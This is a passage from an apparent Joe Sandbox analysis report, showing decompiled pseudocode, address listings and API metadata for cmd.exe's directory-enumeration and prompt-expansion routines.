												_t226 = _t226 + 0xc;
												__eflags = _t158;
												if(_t158 != 0) {
													_t159 = _v28;
													__eflags = _t159;
													if(_t159 == 0) {
														_t159 =  &_v548;
													}
													_t160 = GetFullPathNameW(_t159, _t223, _t223, _t223);
													__eflags = _t160 - 0x7fe7;
													if(_t160 > 0x7fe7) {
														SetLastError(0x6f);
													}
												}
											}
											_t197 =  &(_v1140.cAlternateFileName);
											_t217 = _t197 + 2;
											do {
												_t139 =  *_t197;
												_t197 = _t197 + 2;
												__eflags = _t139 - _t223;
											} while (_t139 != _t223);
											_t140 = _v28;
											_t198 = _t197 - _t217;
											__eflags = _t198;
											_t199 = _t198 >> 1;
											if(_t198 == 0) {
												L86:
												__eflags = _t140;
												if(_t140 == 0) {
													_t140 =  &_v548;
												}
												E011DC5A2(_t199, 0x4000271b, 1, _t140);
												_t226 = _t226 + 0xc;
												L89:
												_push(_t223);
												_push(GetLastError());
												E011DC5A2(_t199);
												_t144 = _v28;
												__eflags = _t144;
												if(_t144 == 0) {
													_t144 =  &_v548;
												}
												SetFileAttributesW(_t144, _t178);
												 *_v1148 = _t223;
												goto L39;
											}
											__eflags = _t140;
											if(_t140 == 0) {
												_t140 =  &_v548;
											}
											__eflags = 0;
											_t140[_t220] = 0;
											_t203 =  &(_v1140.cFileName);
											_t217 = _t203 + 2;
											do {
												_t147 =  *_t203;
												_t203 = _t203 + 2;
												__eflags = _t147 - _t223;
											} while (_t147 != _t223);
											_t205 = _t203 - _t217 >> 1;
											_t199 =  &_v548;
											__eflags = _t205 + _t220 - 0x7fe7;
											if(_t205 + _t220 < 0x7fe7) {
												E011E0CF2(_t217,  &(_v1140.cFileName));
												_t151 = _v28;
												__eflags = _t151;
												if(_t151 == 0) {
													_t151 =  &_v548;
												}
												E011DC5A2(_t199, 0x4000271b, 1, _t151);
												_t153 = _v28;
												_t226 = _t226 + 0xc;
												__eflags = _t153;
												if(_t153 == 0) {
													_t153 =  &_v548;
												}
												_t153[_t220] = 0;
												_t199 =  &_v548;
												E011E0CF2(_t217,  &(_v1140.cAlternateFileName));
												goto L89;
											}
											E011E0CF2(_t217,  &(_v1140.cAlternateFileName));
											_t140 = _v28;
											goto L86;
										}
									} else {
										_t208 = ".";
										_t164 =  &(_v1140.cFileName);
										_t179 = 4;
										while(1) {
											_t217 =  *_t164;
											if(_t217 !=  *_t208) {
												break;
											}
											if(_t217 == 0) {
												L29:
												_t165 = _t223;
												L30:
												if(_t165 == 0) {
													L39:
													if(FindNextFileW(_v1152,  &_v1140) != 0) {
														goto L14;
													}
													goto L40;
												}
												_t209 = L"..";
												_t166 =  &(_v1140.cFileName);
												while(1) {
													_t217 =  *_t166;
													if(_t217 !=  *_t209) {
														break;
													}
													if(_t217 == 0) {
														L36:
														_t167 = _t223;
														L38:
														if(_t167 != 0) {
															_t210 = _v28;
															__eflags = _v28;
															if(_v28 == 0) {
																_t210 =  &_v548;
															}
															_t217 =  &_v1156;
															_t168 = E011D85EA(_t210,  &_v1156);
															__eflags =  *0x11fd544 - _t223; // 0x0
															if(__eflags != 0) {
																goto L40;
															} else {
																__eflags = _t168;
																if(_t168 == 0) {
																	goto L39;
																}
																_t211 = _v1148;
																 *_v1148 = _t223;
																__eflags = _t168 - 0x91;
																if(_t168 != 0x91) {
																	L58:
																	_t169 = _v28;
																	__eflags = _t169;
																	if(_t169 == 0) {
																		_t169 =  &_v548;
																	}
																	E011DC5A2(_t211, 0x4000271b, 1, _t169);
																	_t226 = _t226 + 0xc;
																	_push(_t223);
																	_push(GetLastError());
																	E011DC5A2(_t211);
																	goto L39;
																}
																__eflags = _v1156 - _t223;
																if(_v1156 == _t223) {
																	goto L39;
																}
																goto L58;
															}
														}
														goto L39;
													}
													_t217 =  *((intOrPtr*)(_t166 + 2));
													_t47 =  &(_t209[2]); // 0x2e
													if(_t217 !=  *_t47) {
														break;
													}
													_t166 = _t166 + _t179;
													_t209 =  &(_t209[_t179]);
													if(_t217 != 0) {
														continue;
													}
													goto L36;
												}
												asm("sbb eax, eax");
												_t167 = _t166 | 0x00000001;
												__eflags = _t167;
												goto L38;
											}
											_t217 =  *((intOrPtr*)(_t164 + 2));
											_t44 =  &(_t208[2]); // 0x200000
											if(_t217 !=  *_t44) {
												break;
											}
											_t164 = _t164 + _t179;
											_t208 =  &(_t208[_t179]);
											if(_t217 != 0) {
												continue;
											}
											goto L29;
										}
										asm("sbb eax, eax");
										_t165 = _t164 | 0x00000001;
										goto L30;
									}
								}
								_t217 =  &(_v1140.cFileName);
								_t214 = _t217;
								_t180 = _t214 + 2;
								do {
									_t173 =  *_t214;
									_t214 = _t214 + 2;
								} while (_t173 != _t223);
								_t194 = _t214 - _t180 >> 1;
								goto L21;
							}
							L40:
							_t176 = _v1144;
							goto L41;
						}
					}
				}
			}





































































                                    0x011d85ea
                                    0x011d85f5
                                    0x011d85fc
                                    0x011d8607
                                    0x011d860c
                                    0x011d860e
                                    0x011d8617
                                    0x011d861a
                                    0x011d861c
                                    0x011d8620
                                    0x011d8626
                                    0x011d862c
                                    0x011d8639
                                    0x011d8655
                                    0x011d8882
                                    0x00000000
                                    0x011d865b
                                    0x011d865b
                                    0x011d8661
                                    0x011d8663
                                    0x011d8666
                                    0x011d8666
                                    0x011d8669
                                    0x011d866c
                                    0x011d8671
                                    0x011d8673
                                    0x011d8675
                                    0x011f03bb
                                    0x011d8859
                                    0x011d885c
                                    0x011d8875
                                    0x011d8875
                                    0x011d8683
                                    0x011d8850
                                    0x011d8857
                                    0x00000000
                                    0x011d8857
                                    0x011d8691
                                    0x011d869a
                                    0x011f03c7
                                    0x011f03c8
                                    0x011f03ca
                                    0x011f03d0
                                    0x011d86a0
                                    0x011d86a1
                                    0x011d86a7
                                    0x011d86ad
                                    0x011d86ad
                                    0x011d86b5
                                    0x00000000
                                    0x011d86bb
                                    0x011d86c0
                                    0x011f03db
                                    0x011f03e1
                                    0x00000000
                                    0x00000000
                                    0x011f03e7
                                    0x011d86cd
                                    0x011d86d2
                                    0x011d86da
                                    0x011d86ec
                                    0x011d86f1
                                    0x011d86f1
                                    0x011d86fd
                                    0x011d8702
                                    0x011d8707
                                    0x011f03ec
                                    0x011f03ec
                                    0x011d8715
                                    0x011d871b
                                    0x011d8724
                                    0x00000000
                                    0x011d872a
                                    0x011d872a
                                    0x011d872a
                                    0x011d872a
                                    0x011d8730
                                    0x00000000
                                    0x00000000
                                    0x011d8736
                                    0x011d873c
                                    0x011d873e
                                    0x011d8741
                                    0x011d8741
                                    0x011d8744
                                    0x011d8747
                                    0x011d874c
                                    0x011d874e
                                    0x011d8750
                                    0x011d876c
                                    0x011d8774
                                    0x011f0615
                                    0x011f061b
                                    0x011f0624
                                    0x011f0626
                                    0x011d883b
                                    0x011d8842
                                    0x011d8848
                                    0x011d884e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d884e
                                    0x011d877a
                                    0x011d877f
                                    0x011f03f7
                                    0x011f03f7
                                    0x011d878e
                                    0x011d8793
                                    0x011d879c
                                    0x011f047a
                                    0x011f047d
                                    0x011f047f
                                    0x011f0482
                                    0x011f0484
                                    0x011f0486
                                    0x011f0486
                                    0x011f048e
                                    0x011f048e
                                    0x011f0493
                                    0x011f0493
                                    0x011f0499
                                    0x011f049c
                                    0x011f049e
                                    0x011f04a0
                                    0x011f04a0
                                    0x011f04a6
                                    0x011f04a8
                                    0x011f04ad
                                    0x011f04af
                                    0x00000000
                                    0x011f04b5
                                    0x011f04b5
                                    0x011f04ba
                                    0x00000000
                                    0x00000000
                                    0x011f04c0
                                    0x011f04c3
                                    0x011f04c5
                                    0x011f04c8
                                    0x011f04ca
                                    0x011f04cc
                                    0x011f04cc
                                    0x011f04da
                                    0x011f04e0
                                    0x011f04e3
                                    0x011f04e5
                                    0x011f04e7
                                    0x011f04ea
                                    0x011f04ec
                                    0x011f04ee
                                    0x011f04ee
                                    0x011f04f8
                                    0x011f04fe
                                    0x011f0503
                                    0x011f0507
                                    0x011f0507
                                    0x011f0503
                                    0x011f04e5
                                    0x011f050d
                                    0x011f0513
                                    0x011f0516
                                    0x011f0516
                                    0x011f0519
                                    0x011f051c
                                    0x011f051c
                                    0x011f0521
                                    0x011f0524
                                    0x011f0524
                                    0x011f0526
                                    0x011f0528
                                    0x011f0571
                                    0x011f0571
                                    0x011f0573
                                    0x011f0575
                                    0x011f0575
                                    0x011f0583
                                    0x011f0588
                                    0x011f058b
                                    0x011f058b
                                    0x011f0592
                                    0x011f0593
                                    0x011f0598
                                    0x011f059d
                                    0x011f059f
                                    0x011f05a1
                                    0x011f05a1
                                    0x011f05a9
                                    0x011f05b5
                                    0x00000000
                                    0x011f05b5
                                    0x011f052a
                                    0x011f052c
                                    0x011f052e
                                    0x011f052e
                                    0x011f0534
                                    0x011f0536
                                    0x011f053a
                                    0x011f0540
                                    0x011f0543
                                    0x011f0543
                                    0x011f0546
                                    0x011f0549
                                    0x011f0549
                                    0x011f0550
                                    0x011f0555
                                    0x011f055b
                                    0x011f0560
                                    0x011f05c3
                                    0x011f05c8
                                    0x011f05cb
                                    0x011f05cd
                                    0x011f05cf
                                    0x011f05cf
                                    0x011f05dd
                                    0x011f05e2
                                    0x011f05e5
                                    0x011f05e8
                                    0x011f05ea
                                    0x011f05ec
                                    0x011f05ec
                                    0x011f05f4
                                    0x011f05ff
                                    0x011f0605
                                    0x00000000
                                    0x011f0605
                                    0x011f0569
                                    0x011f056e
                                    0x00000000
                                    0x011f056e
                                    0x011d87a2
                                    0x011d87a4
                                    0x011d87a9
                                    0x011d87af
                                    0x011d87b0
                                    0x011d87b0
                                    0x011d87b6
                                    0x00000000
                                    0x00000000
                                    0x011d87bf
                                    0x011d87d8
                                    0x011d87d8
                                    0x011d87da
                                    0x011d87dc
                                    0x011d881a
                                    0x011d882f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d882f
                                    0x011d87de
                                    0x011d87e3
                                    0x011d87e9
                                    0x011d87e9
                                    0x011d87ef
                                    0x00000000
                                    0x00000000
                                    0x011d87f4
                                    0x011d8809
                                    0x011d8809
                                    0x011d8812
                                    0x011d8814
                                    0x011f0402
                                    0x011f0405
                                    0x011f0407
                                    0x011f0409
                                    0x011f0409
                                    0x011f040f
                                    0x011f0415
                                    0x011f041a
                                    0x011f0420
                                    0x00000000
                                    0x011f0426
                                    0x011f0426
                                    0x011f0428
                                    0x00000000
                                    0x00000000
                                    0x011f042e
                                    0x011f0434
                                    0x011f0436
                                    0x011f043b
                                    0x011f0449
                                    0x011f0449
                                    0x011f044c
                                    0x011f044e
                                    0x011f0450
                                    0x011f0450
                                    0x011f045e
                                    0x011f0463
                                    0x011f0466
                                    0x011f046d
                                    0x011f046e
                                    0x00000000
                                    0x011f0474
                                    0x011f043d
                                    0x011f0443
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0443
                                    0x011f0420
                                    0x00000000
                                    0x011d8814
                                    0x011d87f6
                                    0x011d87fa
                                    0x011d87fe
                                    0x00000000
                                    0x00000000
                                    0x011d8800
                                    0x011d8802
                                    0x011d8807
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d8807
                                    0x011d880d
                                    0x011d880f
                                    0x011d880f
                                    0x00000000
                                    0x011d880f
                                    0x011d87c1
                                    0x011d87c5
                                    0x011d87c9
                                    0x00000000
                                    0x00000000
                                    0x011d87cf
                                    0x011d87d1
                                    0x011d87d6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d87d6
                                    0x011d8876
                                    0x011d8878
                                    0x00000000
                                    0x011d8878
                                    0x011d879c
                                    0x011d8752
                                    0x011d8758
                                    0x011d875a
                                    0x011d875d
                                    0x011d875d
                                    0x011d8760
                                    0x011d8763
                                    0x011d876a
                                    0x00000000
                                    0x011d876a
                                    0x011d8835
                                    0x011d8835
                                    0x00000000
                                    0x011d8835
                                    0x011d8724
                                    0x011d86b5

                                    APIs
                                    • memset.MSVCRT ref: 011D862C
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 011D8691
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 011D86A1
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,011D250C,?,?,?,-00000105), ref: 011D8715
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 011D8827
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011D8842
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D885C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstmemset$Next
                                    • String ID: \\?\
                                    • API String ID: 3059144641-4282027825
                                    • Opcode ID: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                    • Instruction ID: 0e3f421af7f84e1e86e2c1c3aec1e6f4d4825a6dbf7035d2294294d4b06031d6
                                    • Opcode Fuzzy Hash: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                    • Instruction Fuzzy Hash: D4D1D571A0011A9BDF2DDB68EC99BBE7779EF18304F4404ADE609D3142EB709A85CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6FF0, Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 73%
                                    			E011F6FF0(void* __ecx) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				void _v50;
				void _v52;
				void _v54;
				short _v56;
				char _v124;
				char _v644;
				void* _v648;
				void* _v652;
				signed int _v656;
				signed short* _v660;
				signed short* _v664;
				WCHAR* _v668;
				signed int _v672;
				void* _v676;
				char _v680;
				char _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t111;
				signed int _t112;
				intOrPtr _t119;
				void _t121;
				signed short _t122;
				signed int _t125;
				signed int _t126;
				void _t131;
				void _t136;
				intOrPtr* _t138;
				void _t142;
				signed int _t153;
				signed short* _t163;
				intOrPtr* _t164;
				void* _t167;
				signed short* _t173;
				signed int _t174;
				void* _t184;
				signed int _t187;
				void* _t188;
				signed int _t189;
				signed int _t190;
				void* _t191;
				signed int _t193;
				void* _t196;
				void* _t199;
				signed short* _t200;
				void* _t201;
				intOrPtr* _t202;
				signed int _t204;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				signed short* _t213;
				void* _t214;
				signed int _t219;
				signed int _t221;
				intOrPtr _t222;
				signed int _t226;
				intOrPtr _t227;
				intOrPtr _t228;

				_t153 = _t219;
				_push(__ecx);
				_push(__ecx);
				_t221 = (_t219 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				_t217 = _t221;
				_push(0xfffffffe);
				_push(0x11fc140);
				_push(E011E7290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t153);
				_t222 = _t221 - 0x288;
				_t111 =  *0x11fd0b4; // 0x2833377e
				_v20 = _v20 ^ _t111;
				_t112 = _t111 ^ _t221;
				_v48 = _t112;
				_push(_t112);
				_t113 =  &_v28;
				 *[fs:0x0] =  &_v28;
				_v36 = _t222;
				_v672 = 0;
				_t226 =  *0x11fd544; // 0x0
				if(_t226 != 0) {
					_push(0);
					_push(0x2335);
					_t113 = E011DC108(__ecx);
					EnterCriticalSection( *0x1203858);
					 *0x11fd544 = 0;
					LeaveCriticalSection( *0x1203858);
				}
				_t227 =  *0x11fd0c8; // 0x1
				if(_t227 == 0) {
					L96:
					 *[fs:0x0] = _v28;
					_pop(_t199);
					_pop(_t207);
					return E011E6FD0(_t113, _t153, _v48 ^ _t217, _t182, _t199, _t207);
				} else {
					_t228 =  *0x11fd5c8; // 0x0
					if(_t228 == 0) {
						E011E25D9(L"\r\n");
					}
					if( *0x1207896 == 0) {
						_t200 = E011DCFBC(L"PROMPT");
						_v660 = _t200;
						if(_t200 != 0) {
							_v660 = 0x1218110;
							E011E1040(0x1218110, 0x200, _t200);
							 *0x1207896 = 1;
						}
					} else {
						_v660 = 0x1218110;
					}
					_t160 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t160 = 0x1213ab0;
					}
					_t182 =  *0x1213cc0;
					E011E36CB(_t153, _t160,  *0x1213cc0, 0);
					_t113 = E011F6FA6( &_v680);
					_v676 = _t113;
					if(_t113 == 0) {
						goto L96;
					} else {
						_t201 = _t113;
						_v652 = _t201;
						 *_t113 = 0;
						_t209 = _v680 - 1;
						_v648 = _t209;
						_t163 = _v660;
						if(_t163 == 0) {
							L86:
							_t117 =  *0x1213cb8;
							if( *0x1213cb8 == 0) {
								_t117 = 0x1213ab0;
							}
							_t202 = _v676;
							E011E274C(_t202, _t209, L"%s>", _t117);
							_t164 = _t202;
							_t103 = _t164 + 2; // 0x2
							_t210 = _t103;
							do {
								_t119 =  *_t164;
								_t164 = _t164 + 2;
							} while (_t119 != 0);
							_t201 = _t202 + (_t164 - _t210 >> 1) * 2;
							L91:
							_t167 = 0;
							L92:
							 *_t201 = 0;
							_t203 = _v676;
							_t184 = _v676;
							_t107 = _t184 + 2; // 0x2
							_t211 = _t107;
							do {
								_t121 =  *_t184;
								_t184 = _t184 + 2;
							} while (_t121 != _t167);
							_t182 = _t184 - _t211 >> 1;
							_t113 = E011E2616(_t203, _t184 - _t211 >> 1);
							if( *0x11fd544 != 0) {
								EnterCriticalSection( *0x1203858);
								 *0x11fd544 =  *0x11fd544 & 0x00000000;
								LeaveCriticalSection( *0x1203858);
							}
							goto L96;
						}
						_t122 =  *_t163 & 0x0000ffff;
						if(_t122 == 0) {
							goto L86;
						}
						L14:
						while(_t122 != 0) {
							if(_t122 == 0x24) {
								_t213 =  &(_v660[1]);
								_v660 = _t213;
								_v664 = _t213;
								_t204 = 0;
								_v656 = 0x11d3b90;
								while(towupper( *_t213 & 0x0000ffff) !=  *_v656) {
									_t204 = _t204 + 1;
									_t35 = 0x11d3b90 + _t204 * 6; // 0x30050
									_t138 = _t35;
									_v656 = _t138;
									_t167 = 0;
									if( *_t138 != 0) {
										continue;
									}
									L28:
									_t125 = _t204 * 6;
									_t201 = _v652;
									_t214 = _v648;
									if( *((intOrPtr*)(_t125 + 0x11d3b90)) == _t167) {
										goto L92;
									}
									_t40 = _t125 + 0x11d3b92; // 0x3
									_t187 =  *_t40 & 0x0000ffff;
									if(_t187 != 8) {
										_t45 = _t187 - 1; // 0x2
										_t126 = _t45;
										if(_t126 > 9) {
											L78:
											_t127 =  *0x1213cb8;
											if( *0x1213cb8 == 0) {
												_t127 = 0x1213ab0;
											}
											E011E274C(_t201, _t214, L"%c",  *_t127 & 0x0000ffff);
											_t222 = _t222 + 0x10;
											_t188 = _t201;
											_v664 = _t188 + 2;
											do {
												_t131 =  *_t188;
												_t188 = _t188 + 2;
											} while (_t131 != 0);
											_t189 = _t188 - _v664;
											L83:
											_t190 = _t189 >> 1;
											_t209 = _t214 - _t190;
											_t201 = _t201 + _t190 * 2;
											L84:
											_v648 = _t209;
											_v652 = _t201;
											L85:
											_t173 =  &(_v660[1]);
											_v660 = _t173;
											_t122 =  *_t173 & 0x0000ffff;
											goto L14;
										}
										switch( *((intOrPtr*)(_t126 * 4 +  &M011F7698))) {
											case 0:
												_t132 = E011D96A0(0, 1, _t201, _t214);
												goto L36;
											case 1:
												__edx = 0;
												__edx = 1;
												__ecx = 0;
												__eax = E011D5AEF(0, 1, __edi, __esi);
												L36:
												_t201 = _t201 + _t132 * 2;
												_t209 = _t214 - _t132;
												goto L84;
											case 2:
												__eax =  *0x1213cb8;
												if( *0x1213cb8 == 0) {
													__eax = 0x1213ab0;
												}
												__eax = E011E274C(__edi, __esi, L"%s", __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 3:
												__ecx =  &_v124;
												E011D443C(__ecx) =  &_v124;
												__esi = E011DB3FC(__ecx, 0x2350,  &_v124);
												E011E274C(__edi, _v648, L"%s", __esi) = LocalFree(__esi);
												__edx = __edi;
												__esi = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - __esi;
												__esi = _v648;
												goto L83;
											case 4:
												__eax = 0x11d3948;
												if(_v672 == 0) {
													__eax = 0x11d3958;
												}
												__edx = __esi;
												__ecx = __edi;
												__eax = E011E1040(__edi, __esi, __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 5:
												__edx = __esi;
												__ecx = __edi;
												__eax = E011E1040(__edi, __esi, L"\r\n");
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 6:
												goto L78;
											case 7:
												if( *0x1213cc9 == 0) {
													goto L85;
												}
												__ecx =  *0x1213ce4;
												while(__esi > 1) {
													__eax = __ecx;
													__ecx = __ecx - 1;
													if(__eax == 0) {
														goto L85;
													}
													_push(0x2b);
													_pop(__eax);
													 *__edi = __ax;
													__edi = __edi + 2;
													_v652 = __edi;
													__esi = __esi - 1;
													_v648 = __esi;
												}
												goto L85;
											case 8:
												if( *0x1213cc9 == 0) {
													goto L85;
												}
												_v668 = __ecx;
												__ecx =  *0x1213cb8;
												__eax = __ecx;
												if(__ecx == 0) {
													__eax = 0x1213ab0;
												}
												__ax =  *__eax;
												_v56 =  *__eax;
												if(__ecx == 0) {
													__ecx = 0x1213ab0;
												}
												__ax =  *((intOrPtr*)(__ecx + 2));
												_v54 = __ax;
												_push(0x5c);
												_pop(__eax);
												_v52 = __ax;
												__eax = 0;
												_v50 = __ax;
												__eax =  &_v56;
												if(GetDriveTypeW( &_v56) != 4) {
													goto L85;
												} else {
													__eax = 0;
													_v52 = __ax;
													_v684 = 0x104;
													_v16 = _v16 & 0;
													__eax = E011E7797(__ecx);
													if(__al == 0) {
														_v668 = 0x78;
													} else {
														__eax =  &_v684;
														_push( &_v684);
														__eax =  &_v644;
														_push( &_v644);
														__eax =  &_v56;
														_push( &_v56);
														__eax =  *0x121c028();
														_v668 =  &_v56;
													}
													_v16 = 0xfffffffe;
													if(_v668 == 0) {
														 &_v644 = E011E274C(__edi, __esi, L"%s ",  &_v644);
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													} else {
														if(_v668 == 0x8ca) {
															goto L85;
														}
														_push(L"Unknown");
														_push(__esi);
														_push(__edi);
														__eax = E011E274C();
														__esp = __esp + 0xc;
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													}
													goto L83;
												}
										}
									}
									_t41 = _t125 + 0x11d3b94; // 0x450000
									E011E274C(_t201, _t214, L"%c",  *_t41 & 0x0000ffff);
									_t222 = _t222 + 0x10;
									_t196 = _t201;
									_v656 = _t196 + 2;
									do {
										_t136 =  *_t196;
										_t196 = _t196 + 2;
									} while (_t136 != 0);
									_t189 = _t196 - _v656;
									goto L83;
								}
								_t167 = 0;
								goto L28;
							}
							E011E274C(_t201, _t209, L"%c", _t122 & 0x0000ffff);
							_t222 = _t222 + 0x10;
							_t191 = _t201;
							_t18 = _t191 + 2; // 0x2
							_v656 = _t18;
							_t174 = 0;
							do {
								_t142 =  *_t191;
								_t191 = _t191 + 2;
							} while (_t142 != 0);
							_t193 = _t191 - _v656 >> 1;
							_t201 = _t201 + _t193 * 2;
							_v652 = _t201;
							_t209 = _t209 - _t193;
							_v648 = _t209;
							if(E011D68B5() == 0) {
								L22:
								_v672 = _t174;
								goto L85;
							}
							_v656 =  *_v660 & 0x0000ffff;
							if(E011F7AB0( *_v660 & 0x0000ffff) == 0) {
								_t174 = 0;
								goto L22;
							}
							_v672 = _v656 & 0x0000ffff;
							goto L85;
						}
						goto L91;
					}
				}
			}






































































                                    0x011f6ff3
                                    0x011f6ff5
                                    0x011f6ff6
                                    0x011f6ffa
                                    0x011f7001
                                    0x011f7005
                                    0x011f7007
                                    0x011f7009
                                    0x011f700e
                                    0x011f7019
                                    0x011f701a
                                    0x011f701b
                                    0x011f701c
                                    0x011f701d
                                    0x011f7023
                                    0x011f7028
                                    0x011f702b
                                    0x011f702d
                                    0x011f7032
                                    0x011f7033
                                    0x011f7036
                                    0x011f703c
                                    0x011f7041
                                    0x011f7047
                                    0x011f704d
                                    0x011f704f
                                    0x011f7050
                                    0x011f7055
                                    0x011f7062
                                    0x011f7068
                                    0x011f7074
                                    0x011f7074
                                    0x011f707a
                                    0x011f7080
                                    0x011f7678
                                    0x011f767b
                                    0x011f7683
                                    0x011f7684
                                    0x011f7695
                                    0x011f7086
                                    0x011f7086
                                    0x011f708c
                                    0x011f7093
                                    0x011f7098
                                    0x011f70a0
                                    0x011f70b9
                                    0x011f70bb
                                    0x011f70c3
                                    0x011f70d0
                                    0x011f70d8
                                    0x011f70dd
                                    0x011f70dd
                                    0x011f70a2
                                    0x011f70a7
                                    0x011f70a7
                                    0x011f70e4
                                    0x011f70ec
                                    0x011f70ee
                                    0x011f70ee
                                    0x011f70f4
                                    0x011f70fa
                                    0x011f7105
                                    0x011f710a
                                    0x011f7112
                                    0x00000000
                                    0x011f7118
                                    0x011f7118
                                    0x011f711a
                                    0x011f7122
                                    0x011f712b
                                    0x011f712c
                                    0x011f7132
                                    0x011f713a
                                    0x011f75eb
                                    0x011f75eb
                                    0x011f75f2
                                    0x011f75f4
                                    0x011f75f4
                                    0x011f7600
                                    0x011f7607
                                    0x011f760f
                                    0x011f7611
                                    0x011f7611
                                    0x011f7616
                                    0x011f7616
                                    0x011f7619
                                    0x011f761c
                                    0x011f7625
                                    0x011f7628
                                    0x011f7628
                                    0x011f762a
                                    0x011f762c
                                    0x011f762f
                                    0x011f7635
                                    0x011f7637
                                    0x011f7637
                                    0x011f763a
                                    0x011f763a
                                    0x011f763d
                                    0x011f7640
                                    0x011f7647
                                    0x011f764b
                                    0x011f7657
                                    0x011f765f
                                    0x011f7665
                                    0x011f7672
                                    0x011f7672
                                    0x00000000
                                    0x011f7657
                                    0x011f7140
                                    0x011f7146
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f714c
                                    0x011f7159
                                    0x011f71ed
                                    0x011f71f0
                                    0x011f71f6
                                    0x011f71fe
                                    0x011f7200
                                    0x011f720a
                                    0x011f7220
                                    0x011f7224
                                    0x011f7224
                                    0x011f722a
                                    0x011f7230
                                    0x011f7235
                                    0x00000000
                                    0x00000000
                                    0x011f723b
                                    0x011f723b
                                    0x011f7245
                                    0x011f724b
                                    0x011f7251
                                    0x00000000
                                    0x00000000
                                    0x011f7257
                                    0x011f7257
                                    0x011f7261
                                    0x011f729d
                                    0x011f729d
                                    0x011f72a3
                                    0x011f7582
                                    0x011f7582
                                    0x011f7589
                                    0x011f758b
                                    0x011f758b
                                    0x011f759b
                                    0x011f75a0
                                    0x011f75a3
                                    0x011f75a8
                                    0x011f75b0
                                    0x011f75b0
                                    0x011f75b3
                                    0x011f75b6
                                    0x011f75bb
                                    0x011f75c1
                                    0x011f75c1
                                    0x011f75c3
                                    0x011f75c5
                                    0x011f75c8
                                    0x011f75c8
                                    0x011f75ce
                                    0x011f75d4
                                    0x011f75da
                                    0x011f75dd
                                    0x011f75e3
                                    0x00000000
                                    0x011f75e3
                                    0x011f72a9
                                    0x00000000
                                    0x011f72b7
                                    0x00000000
                                    0x00000000
                                    0x011f72c8
                                    0x011f72ca
                                    0x011f72cb
                                    0x011f72cd
                                    0x011f72bc
                                    0x011f72bc
                                    0x011f72bf
                                    0x00000000
                                    0x00000000
                                    0x011f72d4
                                    0x011f72db
                                    0x011f72dd
                                    0x011f72dd
                                    0x011f72ea
                                    0x011f72f2
                                    0x011f72f4
                                    0x011f72f7
                                    0x011f72fd
                                    0x011f72ff
                                    0x011f72ff
                                    0x011f7302
                                    0x011f7305
                                    0x011f730a
                                    0x00000000
                                    0x00000000
                                    0x011f7315
                                    0x011f731d
                                    0x011f732b
                                    0x011f7343
                                    0x011f7349
                                    0x011f734b
                                    0x011f734e
                                    0x011f7350
                                    0x011f7350
                                    0x011f7353
                                    0x011f7356
                                    0x011f735b
                                    0x011f735d
                                    0x00000000
                                    0x00000000
                                    0x011f7370
                                    0x011f7375
                                    0x011f7377
                                    0x011f7377
                                    0x011f737d
                                    0x011f737f
                                    0x011f7381
                                    0x011f7386
                                    0x011f7388
                                    0x011f738b
